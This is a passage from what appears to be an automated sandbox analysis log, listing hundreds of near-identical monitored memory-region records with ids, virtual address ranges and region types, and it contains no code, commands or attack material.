"pagefile_0x0000000000530000" filename = "" Region: id = 3950 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3951 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3952 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3953 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3954 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3955 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3956 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3957 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3958 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3959 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3960 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3961 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3962 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3963 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3964 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3965 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3966 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3967 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3968 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3969 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3970 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3971 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3972 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3973 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3974 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3975 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3976 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3977 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3978 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3979 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3980 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3981 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 3982 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 3983 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3984 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3985 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3986 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3987 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3988 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3989 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3990 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3991 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3992 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3993 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3994 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3995 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3996 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3997 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3998 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3999 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4000 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4001 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4002 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4003 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4004 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4005 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4006 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4007 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4008 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4009 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4010 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4011 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4012 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4013 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4014 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4015 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4016 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4017 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4018 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4019 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4020 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4021 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4022 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4023 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4024 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4025 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4026 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4027 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4028 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4029 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4030 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4031 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4032 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4033 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4034 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4035 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4036 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4037 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4038 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4039 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4040 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4041 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4042 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4043 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4044 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4045 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4046 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4047 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4048 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4049 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4050 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4051 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4052 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4053 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4054 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4055 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4056 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4057 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4066 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4067 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4068 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4069 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4070 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4071 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4072 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4073 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4074 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4075 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4076 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4077 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4078 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4079 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4080 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4081 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4082 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4083 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4084 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4085 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4086 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4087 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4088 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4089 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4090 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4091 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4092 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4093 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4094 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4095 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4096 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4097 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4098 start_va = 0x530000 end_va = 0x530fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4099 start_va = 0x8070000 end_va = 0x8169fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000008070000" filename = "" Region: id = 4100 start_va = 0x2360000 end_va = 0x236ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4101 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4102 start_va = 0x2460000 end_va = 0x246efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002460000" filename = "" Region: id = 4103 start_va = 0x2360000 end_va = 0x236efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002360000" filename = "" Region: id = 4104 start_va = 0x2360000 end_va = 0x236efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002360000" filename = "" Region: id = 4105 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4106 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4107 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4108 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4109 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4110 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4111 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4112 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4113 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4114 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4115 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4116 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4117 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4118 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4119 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4120 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4121 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4122 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4123 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4124 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4125 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4126 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4127 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4128 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4129 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4130 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4131 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4132 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4133 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4134 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4135 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4136 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4137 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4138 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4139 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4140 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4141 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4142 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4143 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4144 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4145 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4146 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4147 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4148 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4153 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4154 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4155 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4156 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4157 start_va 